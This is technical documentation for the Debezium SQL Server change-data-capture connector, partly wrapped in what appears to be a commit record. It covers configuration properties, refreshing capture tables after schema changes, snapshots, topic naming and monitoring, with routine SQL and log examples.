|[[sqlserver-property-snapshot-fetch-size]]<<sqlserver-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>
|`2000`
|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.
The connector will read the table contents in multiple batches of this size.
Defaults to 2000.

|[[sqlserver-property-query-fetch-size]]<<sqlserver-property-query-fetch-size, `+query.fetch.size+`>>
|No default
|Specifies the number of rows that will be fetched for each database round-trip of a given query.
Defaults to the JDBC driver's default fetch size.

|[[sqlserver-property-snapshot-lock-timeout-ms]]<<sqlserver-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>
|`10000`
|An integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If table locks cannot be acquired in this time interval, the snapshot will fail (also see xref:{link-sqlserver-connector}#sqlserver-snapshots[snapshots]). +
When set to `0` the connector will fail immediately when it cannot obtain the lock. Value `-1` indicates infinite waiting.

|[[sqlserver-property-snapshot-select-statement-overrides]]<<sqlserver-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>
|No default
|Specifies the table rows to include in a snapshot.
Use the property if you want a snapshot to include only a subset of the rows in a table.
This property affects snapshots only.
It does not apply to events that the connector reads from the log.

The property contains a comma-separated list of fully-qualified table names in the form `_<schemaName>.<tableName>_`. For example, +
 +
`+"snapshot.select.statement.overrides": "inventory.products,customers.orders"+` +
 +
For each table in the list, add a further configuration property that specifies the `SELECT` statement for the connector to run on the table when it takes a snapshot.
The specified `SELECT` statement determines the subset of table rows to include in the snapshot.
Use the following format to specify the name of this `SELECT` statement property: +
 +
`snapshot.select.statement.overrides._<schemaName>_._<tableName>_`.
For example,
`snapshot.select.statement.overrides.customers.orders`. +
 +
Example:

From a `customers.orders` table that includes the soft-delete column, `delete_flag`, add the following properties if you want a snapshot to include only those records that are not soft-deleted:

----
"snapshot.select.statement.overrides": "customers.orders",
"snapshot.select.statement.overrides.customers.orders": "SELECT * FROM [customers].[orders] WHERE delete_flag = 0 ORDER BY id DESC"
----

In the resulting snapshot, the connector includes only the records for which `delete_flag = 0`.
ifdef::community[]
|[[sqlserver-property-source-struct-version]]<<sqlserver-property-source-struct-version, `+source.struct.version+`>>
|v2
|Schema version for the `source` block in CDC events; {prodname} 0.10 introduced a few breaking +
changes to the structure of the `source` block in order to unify the exposed structure across
all the connectors. +
By setting this option to `v1` the structure used in earlier versions can be produced.
Note that this setting is not recommended and is planned for removal in a future {prodname} version.
endif::community[]

|[[sqlserver-property-sanitize-field-names]]<<sqlserver-property-sanitize-field-names, `+sanitize.field.names+`>>
|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.
|Whether field names are sanitized to adhere to Avro naming requirements.
See xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.

|[[sqlserver-property-provide-transaction-metadata]]<<sqlserver-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>
|`false`
|When set to `true`, {prodname} generates events with transaction boundaries and enriches the data event envelope with transaction metadata.

|[[sqlserver-property-retriable-restart-connector-wait-ms]]<<sqlserver-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +
|10000 (10 seconds)
|The number of milliseconds to wait before restarting a connector after a retriable error occurs.

|[[sqlserver-property-skipped-operations]]<<sqlserver-property-skipped-operations, `+skipped.operations+`>>
|`t`
|A comma-separated list of operation types that will be skipped during streaming.
The operations include: `c` for inserts/create, `u` for updates, `d` for deletes, `t` for truncates, and `none` to not skip any operations.
By default, truncate operations are skipped (not emitted by this connector).

|[[sqlserver-property-signal-data-collection]]<<sqlserver-property-signal-data-collection,`+signal.data.collection+`>>
|No default value
|Fully-qualified name of the data collection that is used to send xref:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector. +
Use the following format to specify the collection name: +
`_<databaseName>_._<schemaName>_._<tableName>_`

|[[sqlserver-property-incremental-snapshot-allow-schema-changes]]<<sqlserver-property-incremental-snapshot-allow-schema-changes, `+incremental.snapshot.allow.schema.changes+`>>
|`false`
|Allow schema changes during an incremental snapshot. When enabled, the connector detects schema changes during an incremental snapshot and re-selects the current chunk to avoid locking DDLs. +
 +
Note that changes to a primary key are not supported and can cause incorrect results if performed during an incremental snapshot. Another limitation is that if a schema change affects only columns' default values, then the change is not detected until the DDL is processed from the transaction log stream.
This doesn't affect the snapshot events' values, but the schema of snapshot events may have outdated defaults.

|[[sqlserver-property-incremental-snapshot-chunk-size]]<<sqlserver-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>
|`1024`
|The maximum number of rows that the connector fetches and reads into memory during an incremental snapshot chunk.
Increasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.
However, larger chunk sizes also require more memory to buffer the snapshot data.
Adjust the chunk size to a value that provides the best performance in your environment.

|[[sqlserver-property-max-iteration-transactions]]<<sqlserver-property-max-iteration-transactions, `+max.iteration.transactions+`>>
|0
|Specifies the maximum number of transactions per iteration to be used to reduce the memory footprint when streaming changes from multiple tables in a database.
When set to `0` (the default), the connector uses the current maximum LSN as the range to fetch changes from.
When set to a value greater than zero, the connector uses the n-th LSN specified by this setting as the range to fetch changes from.

|[[sqlserver-property-incremental-snapshot-option-recompile]]<<sqlserver-property-incremental-snapshot-option-recompile, `+incremental.snapshot.option.recompile+`>>
|`false`
|Applies the `OPTION(RECOMPILE)` query hint to all `SELECT` statements used during an incremental snapshot. This can help to solve parameter sniffing issues that might occur, but can increase CPU load on the source database, depending on the frequency of query execution.

|[[sqlserver-property-topic-naming-strategy]]<<sqlserver-property-topic-naming-strategy, `topic.naming.strategy`>>
|`io.debezium.schema.SchemaTopicNamingStrategy`
|The name of the TopicNamingStrategy class that should be used to determine the topic names for data change, schema change, transaction, and heartbeat events. Defaults to `SchemaTopicNamingStrategy`.

|[[sqlserver-property-topic-delimiter]]<<sqlserver-property-topic-delimiter, `topic.delimiter`>>
|`.`
|Specifies the delimiter for topic names. Defaults to `.`.

|[[sqlserver-property-topic-cache-size]]<<sqlserver-property-topic-cache-size, `topic.cache.size`>>
|`10000`
|The size of the bounded concurrent hash map that is used to hold topic names. The cache helps to determine the topic name that corresponds to a given data collection.

|[[sqlserver-property-topic-heartbeat-prefix]]<<sqlserver-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>
|`__debezium-heartbeat`
|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +
 +
_topic.heartbeat.prefix_._topic.prefix_ +
 +
For example, if the topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.

|[[sqlserver-property-topic-transaction]]<<sqlserver-property-topic-transaction, `topic.transaction`>>
|`transaction`
|Controls the name of the topic to which the connector sends transaction metadata messages.
The topic name has this pattern: +
 +
_topic.prefix_._topic.transaction_ +
 +
For example, if the topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.

For more information, see xref:sqlserver-transaction-metadata[Transaction Metadata].

|===

[id="debezium-sqlserver-connector-database-history-configuration-properties"]
==== {prodname} SQL Server connector database schema history configuration properties

include::{partialsdir}/modules/all-connectors/ref-connector-configuration-database-history-properties.adoc[leveloffset=+1]

[id="debezium-sqlserver-connector-pass-through-database-driver-configuration-properties"]
==== {prodname} SQL Server connector pass-through database driver configuration properties

include::{partialsdir}/modules/all-connectors/ref-connector-pass-through-database-driver-configuration-properties.adoc[leveloffset=+1]


// Type: assembly
// ModuleID: refreshing-capture-tables-after-a-schema-change
// Title: Refreshing capture tables after a schema change
[[sqlserver-schema-evolution]]
== Database schema evolution

When change data capture is enabled for a SQL Server table, as changes occur in the table, event records are persisted to a capture table on the server.
If you introduce a change in the structure of the source table, for example, by adding a new column, that change is not dynamically reflected in the change table.
For as long as the capture table continues to use the outdated schema, the {prodname} connector is unable to emit data change events for the table correctly.
You must intervene to refresh the capture table to enable the connector to resume processing change events.

Because of the way that CDC is implemented in SQL Server, you cannot use {prodname} to update capture tables.
To refresh capture tables, you must be a SQL Server database operator with elevated privileges.
As a {prodname} user, you must coordinate tasks with the SQL Server database operator to complete the schema refresh and restore streaming to Kafka topics.

You can use one of the following methods to update capture tables after a schema change:

* xref:{link-sqlserver-connector}#offline-schema-updates[Offline schema updates] require you to stop the {prodname} connector before you can update capture tables.
* xref:{link-sqlserver-connector}#online-schema-updates[Online schema updates] can update capture tables while the {prodname} connector is running.

There are advantages and disadvantages to using each type of procedure.

[WARNING]
====
Whether you use the online or offline update method, you must complete the entire schema update process before you apply subsequent schema updates on the same source table.
The best practice is to execute all DDLs in a single batch so that the procedure needs to be run only once.
====

[NOTE]
====
Some schema changes are not supported on source tables that have CDC enabled.
For example, if CDC is enabled on a table, SQL Server does not allow you to change the schema of the table by renaming one of its columns or changing the column type.
====

[NOTE]
====
After you change a column in a source table from `NULL` to `NOT NULL` or vice versa, the SQL Server connector cannot correctly capture the changed information until after you create a new capture instance.
If you do not create a new capture table after a change to the column designation, change event records that the connector emits do not correctly indicate whether the column is optional.
That is, columns that were previously defined as optional (or `NULL`) continue to be, despite now being defined as `NOT NULL`.
Similarly, columns that had been defined as required (`NOT NULL`) retain that designation, although they are now defined as `NULL`.
====

// Type: procedure
// ModuleID: debezium-sql-server-connector-running-an-offline-update-after-a-schema-change
// Title: Running an offline update after a schema change
[id="offline-schema-updates"]
=== Offline schema updates

Offline schema updates provide the safest method for updating capture tables.
However, offline updates might not be feasible for use with applications that require high availability.

.Prerequisites
* An update was committed to the schema of a SQL Server table that has CDC enabled.
* You are a SQL Server database operator with elevated privileges.

.Procedure

1. Suspend the application that updates the database.
2. Wait for the {prodname} connector to stream all unstreamed change event records.
3. Stop the {prodname} connector.
4. Apply all changes to the source table schema.
5. Create a new capture table for the updated source table by running the `sys.sp_cdc_enable_table` stored procedure with a unique value for the parameter `@capture_instance` (see the sketch after this procedure).
6. Resume the application that you suspended in Step 1.
7. Start the {prodname} connector.
8. After the {prodname} connector starts streaming from the new capture table, drop the old capture table by running the stored procedure `sys.sp_cdc_disable_table` with the parameter `@capture_instance` set to the old capture instance name.
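
The following statements sketch Steps 5 and 8 of the procedure; the schema, table, and capture instance names are illustrative:

[source,sql]
----
-- Step 5: Create a new capture instance that reflects the updated schema.
EXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'customers', @role_name = NULL, @capture_instance = 'dbo_customers_v2';
GO
-- Step 8: After the connector streams from the new capture instance, drop the old one.
EXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'customers', @capture_instance = 'dbo_customers';
GO
----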
\n\n\n.Example: Running an online schema update after a database schema change\nifdef::community[]\nLet's deploy the SQL Server based https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/tutorial#using-sql-server[{prodname} tutorial] to demonstrate the online schema update.\n\nIn the following example, a column `phone_number` is added to the `customers` table.\n\n. Type the following command to start the database shell:\n+\n[source,shell]\n----\ndocker-compose -f docker-compose-sqlserver.yaml exec sqlserver bash -c '\/opt\/mssql-tools\/bin\/sqlcmd -U sa -P $SA_PASSWORD -d testDB'\n----\nendif::community[]\n\nifdef::product[]\n\nThe following example shows how to complete an online schema update in the change table after the column `phone_number` is added to the `customers` source table.\n\nendif::product[]\n\n. Modify the schema of the `customers` source table by running the following query to add the `phone_number` field:\n+\n[source,sql]\n----\nALTER TABLE customers ADD phone_number VARCHAR(32);\n----\n\n. Create the new capture instance by running the `sys.sp_cdc_enable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'customers', @role_name = NULL, @supports_net_changes = 0, @capture_instance = 'dbo_customers_v2';\nGO\n----\n\n. Insert new data into the `customers` table by running the following query:\n+\n[source,sql]\n----\nINSERT INTO customers(first_name,last_name,email,phone_number) VALUES ('John','Doe','john.doe@example.com', '+1-555-123456');\nGO\n----\n+\nThe Kafka Connect log reports on configuration updates through entries similar to the following message:\n+\n[source,shell]\n----\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Multiple capture instances present for the same table: Capture instance \"dbo_customers\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_CT, startLsn=00000024:00000d98:0036, changeTableObjectId=1525580473, stopLsn=00000025:00000ef8:0048] and Capture instance \"dbo_customers_v2\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Schema will be changed for ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n...\nconnect_1 | 2019-01-17 10:11:33,719 INFO || Migrating schema to ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n----\n+\nEventually, the `phone_number` field is added to the schema and its value appears in messages written to the Kafka topic.\n+\n[source,json]\n----\n...\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"phone_number\"\n }\n...\n \"after\": {\n \"id\": 1005,\n \"first_name\": \"John\",\n \"last_name\": \"Doe\",\n 
\"email\": \"john.doe@example.com\",\n \"phone_number\": \"+1-555-123456\"\n },\n----\n\n. Drop the old capture instance by running the `sys.sp_cdc_disable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'dbo_customers', @capture_instance = 'dbo_customers';\nGO\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-sql-server-connector-performance\n\/\/ Title: Monitoring {prodname} SQL Server connector performance\n[[sqlserver-monitoring]]\n== Monitoring\n\nThe {prodname} SQL Server connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\nThe connector provides the following metrics:\n\n* xref:sqlserver-snapshot-metrics[Snapshot metrics] for monitoring the connector when performing snapshots.\n* xref:sqlserver-streaming-metrics[Streaming metrics] for monitoring the connector when reading CDC table data.\n* xref:sqlserver-schema-history-metrics[Schema history metrics] for monitoring the status of the connector's schema history.\n\nFor information about how to expose the preceding metrics through JMX, see the {link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation].\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-snapshot-metrics\n\/\/ Title: {prodname} SQL Server connector snapshot metrics\n[[sqlserver-snapshot-metrics]]\n=== Snapshot metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-streaming-metrics\n\/\/ Title: {prodname} SQL Server connector streaming metrics\n[[sqlserver-streaming-metrics]]\n=== Streaming metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-schema-history-metrics\n\/\/ Title: {prodname} SQL Server connector schema history metrics\n[[sqlserver-schema-history-metrics]]\n=== Schema history metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-connector-for-sql-server\n[id=\"debezium-connector-for-sql-server\"]\n= {prodname} connector for SQL Server\n\n:context: sqlserver\n:data-collection: table\n:mbean-name: sql_server\n:connector-file: {context}\n:connector-class: SqlServer\n:connector-name: SQL Server\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\n[NOTE]\n====\nWant to help us further hone and improve it? 
link:\/docs\/contribute\/[Learn how].\n====\n\ntoc::[]\nendif::community[]\n\nThe {prodname} SQL Server connector captures row-level changes that occur in the schemas of a SQL Server database.\n\nifdef::community[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nFor details about the {prodname} SQL Server connector and its use, see the following topics:\n\n* xref:overview-of-debezium-sql-server-connector[]\n* xref:how-debezium-sql-server-connectors-work[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:how-debezium-sql-server-connectors-map-data-types[]\n* xref:setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[]\n* xref:deployment-of-debezium-sql-server-connectors[]\n* xref:refreshing-capture-tables-after-a-schema-change[]\n* xref:monitoring-debezium-sql-server-connector-performance[]\n\nendif::product[]\n\nThe first time that the {prodname} SQL Server connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas in the database.\nAfter the initial snapshot is complete, the connector continuously captures row-level changes for `INSERT`, `UPDATE`, or `DELETE` operations that are committed to the SQL Server databases that are enabled for CDC.\nThe connector produces events for each data change operation, and streams them to Kafka topics.\nThe connector streams all of the events for a table to a dedicated Kafka topic.\nApplications and services can then consume data change event records from that topic.\n\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} SQL Server connector\n\/\/ ModuleID: overview-of-debezium-sql-server-connector\n[[sqlserver-overview]]\n== Overview\n\nThe {prodname} SQL Server connector is based on the https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/track-changes\/about-change-data-capture-sql-server?view=sql-server-2017[change data capture]\nfeature that is available in https:\/\/blogs.msdn.microsoft.com\/sqlreleaseservices\/sql-server-2016-service-pack-1-sp1-released\/[SQL Server 2016 Service Pack 1 (SP1) and later] Standard edition or Enterprise edition.\nThe SQL Server capture process monitors designated databases and tables, and stores the changes into specifically created _change tables_ that have stored procedure facades.\n\nTo enable the {prodname} SQL Server connector to capture change event records for database operations,\nyou must first enable change data capture on the SQL Server database.\nCDC must be enabled both on the database and on each table that you want to capture.\nAfter you set up CDC on the source database, the connector can capture row-level `INSERT`, `UPDATE`, and `DELETE` operations\nthat occur in the database.\nThe connector writes event records for each source table to a Kafka topic dedicated to that table.\nOne topic exists for each captured table.\nClient applications read the Kafka topics for the database tables that they follow, and can respond to the row-level events they consume from those topics.
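\n\nFor example, a minimal CDC setup for the `testDB` database and a hypothetical `dbo.customers` table might look like the following sketch; the database, table, and option values are illustrative only:\n\n[source,sql]\n----\n-- Enable CDC at the database level (run once per database).\nUSE testDB;\nEXEC sys.sp_cdc_enable_db;\nGO\n\n-- Enable CDC for each table that the connector is expected to capture.\nEXEC sys.sp_cdc_enable_table\n    @source_schema = 'dbo',\n    @source_name = 'customers',\n    @role_name = NULL,\n    @supports_net_changes = 0;\nGO\n----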
\n\nThe first time that the connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas for all tables for which it is configured to capture changes,\nand streams this state to Kafka.\nAfter the snapshot is complete, the connector continuously captures subsequent row-level changes that occur.\nBy first establishing a consistent view of all of the data, the connector can continue reading without having lost any of the changes that were made while the snapshot was taking place.\n\nThe {prodname} SQL Server connector is tolerant of failures.\nAs the connector reads changes and produces events, it periodically records the position of events in the database log (_LSN \/ Log Sequence Number_).\nIf the connector stops for any reason (including communication failures, network problems, or crashes), after a restart the connector resumes reading the SQL Server _CDC_ tables from the last point that it read.\n\nNOTE: Offsets are committed periodically.\nThey are not committed at the time that a change event occurs.\nAs a result, following an outage, duplicate events might be generated.\n\nFault tolerance also applies to snapshots.\nThat is, if the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-sql-server-connectors-work\n\/\/ Title: How {prodname} SQL Server connectors work\n[[how-the-sqlserver-connector-works]]\n== How the SQL Server connector works\n\nTo optimally configure and run a {prodname} SQL Server connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\n\nFor details about how the connector works, see the following sections:\n\n* xref:how-debezium-sql-server-connectors-perform-database-snapshots[]\n* xref:how-the-debezium-sql-server-connector-reads-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records[]\n* xref:how-the-debezium-sql-server-connector-uses-the-schema-change-topic[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} SQL Server connectors perform database snapshots\n\/\/ ModuleID: how-debezium-sql-server-connectors-perform-database-snapshots\n[[sqlserver-snapshots]]\n=== Snapshots\n\nSQL Server CDC is not designed to store a complete history of database changes.\nFor the {prodname} SQL Server connector to establish a baseline for the current state of the database,\nit uses a process called _snapshotting_.\n\nYou can configure how the connector creates snapshots.\nBy default, the connector's snapshot mode is set to `initial`.\nBased on this `initial` snapshot mode, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database.\nThis initial snapshot captures the structure and data for any tables that match the criteria defined by the `include` and `exclude` properties that are configured for the connector (for example, `table.include.list`, `column.include.list`, `table.exclude.list`, and so forth).\n\nWhen the connector creates a snapshot, it completes the following tasks:\n\n1. Determines the tables to be captured.\n2. Obtains a lock on the SQL Server tables for which CDC is enabled to prevent structural changes from occurring during creation of the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` configuration option.\n3. 
Reads the maximum log sequence number (LSN) position in the server's transaction log.\n4. Captures the structure of all relevant tables.\n5. Releases the locks obtained in Step 2, if necessary. In most cases, locks are held for only a short period of time.\n6. Scans the SQL Server source tables and schemas to be captured based on the LSN position that was read in Step 3, generates a `READ` event for each row in the table, and writes the events to the Kafka topic for the table.\n7. Records the successful completion of the snapshot in the connector offsets.\n\nThe resulting initial snapshot captures the current state of each row in the tables that are enabled for CDC.\nFrom this baseline state, the connector captures subsequent changes as they occur.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sqlserver-ad-hoc-snapshots\n[id=\"sqlserver-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"sqlserver-incremental-snapshots\"]\n==== Incremental snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[WARNING]\n====\nThe {prodname} connector for SQL Server does not support schema changes while an incremental snapshot is running.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-reads-change-data-tables\n\/\/ Title: How {prodname} SQL Server connectors read change data tables\n=== Reading the change data tables\n\nWhen the connector first starts, it takes a snapshot of the structure of the captured tables\nand persists this information to its internal database schema history topic.\nThe connector then identifies a change table for each source table, and completes the following steps.\n\n1. For each change table, the connector reads all of the changes that were created between the last stored maximum LSN and the current maximum LSN.\n2. The connector sorts the changes that it reads in ascending order, based on the values of their commit LSN and change LSN.\nThis sorting order ensures that the changes are replayed by {prodname} in the same order in which they occurred in the database.\n3. The connector passes the commit and change LSNs as offsets to Kafka Connect.\n4. The connector stores the maximum LSN and restarts the process from Step 1.\n\nAfter a restart, the connector resumes processing from the last offset (commit and change LSNs) that it read.\n\nThe connector is able to detect whether CDC is enabled or disabled for included source tables, and adjusts its behavior.\n\n\/\/ Type: concept\n\/\/ ModuleID: no-maximum-lsn-recorded-in-the-database\n\/\/ Title: No maximum LSN recorded in the database\n=== No maximum LSN recorded in the database\n\nThere may be situations when no maximum LSN is recorded in the database because:\n\n1. SQL Server Agent is not running.\n2. No changes are recorded in the change table yet.\n3. The database has low activity and the CDC cleanup job periodically clears entries from the CDC tables.\n\nOf these possibilities, because a running SQL Server Agent is a prerequisite, the first case indicates a real problem, while the second and third cases reflect normal operation.
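\n\nAs a quick diagnostic, you can query the maximum LSN directly; `sys.fn_cdc_get_max_lsn()` is a standard SQL Server CDC function, and the second query is the kind of Agent check described below (it requires the `VIEW SERVER STATE` permission):\n\n[source,sql]\n----\n-- Returns the highest LSN that the CDC capture process has recorded.\n-- A NULL result corresponds to the \"no maximum LSN\" situation above.\nSELECT sys.fn_cdc_get_max_lsn() AS max_lsn;\n\n-- Inspect the SQL Server Agent status directly (status 4 means running).\nSELECT dss.[status], dss.[status_desc]\nFROM sys.dm_server_services dss\nWHERE dss.[servicename] LIKE N'SQL Server Agent (%';\n----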
\n\nTo mitigate this issue and to differentiate between the first case and the others, the connector checks the status of the SQL Server Agent through the following query: `\"SELECT CASE WHEN dss.[status]=4 THEN 1 ELSE 0 END AS isRunning FROM [#db].sys.dm_server_services dss WHERE dss.[servicename] LIKE N'SQL Server Agent (%';\"`.\nIf the SQL Server Agent is not running, an ERROR is written to the log: \"No maximum LSN recorded in the database; SQL Server Agent is not running\".\n\n[IMPORTANT]\n====\nThe SQL Server Agent running status query requires `VIEW SERVER STATE` server permission.\nIf you do not want to grant this permission to the configured user, you can choose to configure your own query through the `database.sqlserver.agent.status.query` property.\nYou can define a function that returns `true` or `1` if the SQL Server Agent is running (`false` or `0` otherwise), and safely use high-level permissions without granting them, as explained in link:https:\/\/dba.stackexchange.com\/questions\/62230\/what-minimum-permissions-do-i-need-to-provide-to-a-user-so-that-it-can-check-the\/103275#103275[What minimum permissions do I need to provide to a user so that it can check the status of SQL Server Agent Service?]\nor in link:https:\/\/sqlquantumleap.com\/2018\/02\/15\/safely-and-easily-use-high-level-permissions-without-granting-them-to-anyone-server-level\/[Safely and Easily Use High-Level Permissions Without Granting Them to Anyone: Server-level].\nThe configuration of the query property would look like this: `database.sqlserver.agent.status.query=SELECT [#db].func_is_sql_server_agent_running()` - you need to use `[#db]` as a placeholder for the database name.\n====
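\n\nThe following sketch shows what such a function might look like; `func_is_sql_server_agent_running` is simply the hypothetical name used in the property example above, and the function still depends on the module-signing or impersonation arrangement from the linked articles in order to read the DMV without granting `VIEW SERVER STATE` to the connector user:\n\n[source,sql]\n----\n-- Hypothetical helper function; the name matches the property example above.\n-- On its own, reading sys.dm_server_services still requires VIEW SERVER STATE;\n-- see the linked articles for how to avoid granting it to the caller.\nCREATE FUNCTION dbo.func_is_sql_server_agent_running()\nRETURNS INT\nAS\nBEGIN\n    RETURN (\n        SELECT CASE WHEN dss.[status] = 4 THEN 1 ELSE 0 END\n        FROM sys.dm_server_services dss\n        WHERE dss.[servicename] LIKE N'SQL Server Agent (%'\n    );\nEND;\nGO\n----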
\n\n\/\/ Type: concept\n\/\/ ModuleID: limitations-sql-server-connector\n\/\/ Title: Limitations of {prodname} SQL Server connector\n=== Limitations\n\nSQL Server requires the base object to be a table in order to create a change capture instance.\nAs a consequence, capturing changes from indexed views (also known as materialized views) is not supported by SQL Server, and hence is not supported by the {prodname} SQL Server connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} SQL Server change event records\n[[sqlserver-topic-names]]\n=== Topic names\n\nBy default, the SQL Server connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations that occur in a table to a single Apache Kafka topic that is specific to that table.\nThe connector uses the following convention to name change event topics:\n`_<topicPrefix>_._<databaseName>_._<schemaName>_._<tableName>_`\n\nThe following list provides definitions for the components of the default name:\n\n_topicPrefix_:: The logical name of the server, as specified by the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n_databaseName_:: The name of the database in which the change event occurred.\n_schemaName_:: The name of the database schema in which the change event occurred.\n_tableName_:: The name of the database table in which the change event occurred.\n\nFor example, if `fulfillment` is the server name, `testDB` is the database name, and `dbo` is the schema name, and the database contains tables with the names `products`, `products_on_hand`, `customers`, and `orders`,\nthe connector would stream change event records to the following Kafka topics:\n\n* `fulfillment.testDB.dbo.products`\n* `fulfillment.testDB.dbo.products_on_hand`\n* `fulfillment.testDB.dbo.customers`\n* `fulfillment.testDB.dbo.orders`\n\nThe connector applies similar naming conventions to label its internal database schema history topics, xref:about-the-debezium-sqlserver-connector-schema-change-topic[schema change topics], and xref:sqlserver-transaction-metadata[transaction metadata topics].\n\nIf the default topic names do not meet your requirements, you can configure custom topic names.\nTo configure custom topic names, you specify regular expressions in the logical topic routing SMT.\nFor more information about using the logical topic routing SMT to customize topic naming, see xref:{link-topic-routing}#topic-routing[Topic routing].\n\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-uses-the-schema-change-topic\n\/\/ Title: How the {prodname} SQL Server connector uses the schema change topic\n[[about-the-debezium-sqlserver-connector-schema-change-topic]]\n=== Schema change topic\n\nFor each table for which CDC is enabled, the {prodname} SQL Server connector stores a history of the schema change events that are applied to captured tables in the database.\nThe connector writes schema change events to a Kafka topic named `_<topicPrefix>_`, where `_topicPrefix_` is the logical server name that is specified in the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n\nMessages that the connector sends to the schema change topic contain a payload, and, optionally, also contain the schema of the change event message.\nThe payload of 